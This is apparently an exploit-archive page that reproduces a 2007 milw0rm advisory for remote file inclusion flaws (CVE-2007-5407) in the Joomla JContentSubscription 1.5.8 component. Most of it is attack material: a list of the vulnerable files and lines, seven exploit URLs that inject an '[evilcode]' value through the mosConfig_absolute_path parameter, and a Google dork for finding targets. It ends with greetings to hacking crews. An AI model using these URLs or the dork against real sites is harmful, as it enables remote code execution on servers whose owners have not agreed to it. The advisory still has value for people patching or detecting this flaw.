[] NeoSense
E X P L O I T S
title author type platform port cve id

Joomla! Component JContentSubscription 1.5.8 - Multiple Remote File Inclusions

Author: NoGe
type: webapps
platform: php
port: 
date_added: 2007-10-09 
date_updated:  
verified: 1 
codes: OSVDB-43627;CVE-2007-5407;OSVDB-43624;OSVDB-43623;OSVDB-43622;OSVDB-43621;OSVDB-43620;OSVDB-43619 
tags: 
aliases:  
screenshot_url:  
application_url: 
# JContentSubscription Joomla Component 1.5.8 Multiply Remote File Include Vulnerability

   Component    : com_jcs version 1.5.8 - payable component
   Dicovered by : NoGe
   Contact      : pace.noge@hotmail.com

==================================================================================================================================

# Vulnerable file

   /administrator/components/com_jcs/jcs.function.php

   line 6 require_once( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );

   /administrator/components/com_jcs/view/add.php

   line 7 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );

   /administrator/components/com_jcs/view/history.php

   line 7 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );

   /administrator/components/com_jcs/view/register.php

   line 6 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );

   /administrator/components/com_jcs/views/list.sub.html.php

   line 3 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );

   /administrator/components/com_jcs/views/list.user.sub.html.php

   line 7 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );

   /administrator/components/com_jcs/views/reports.html.php

   line 3 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );

# Exploit

   http://localhost/path/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=[evilcode]

# Google dork

   inurl:com_jcs

==================================================================================================================================

# Greetz

   all crew #papuahacker #baliemhackerlink #nyubicrew
   skulmatic olibekas ulga Cungkee nyubi k1tk4t newbie str0ke
   yooogy H312Y Vaksin13 Oon_Boy Paman mousekill }^-^{ haliq
   http://kapukvalley.net member

==================================================================================================================================

# milw0rm.com [2007-10-10]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.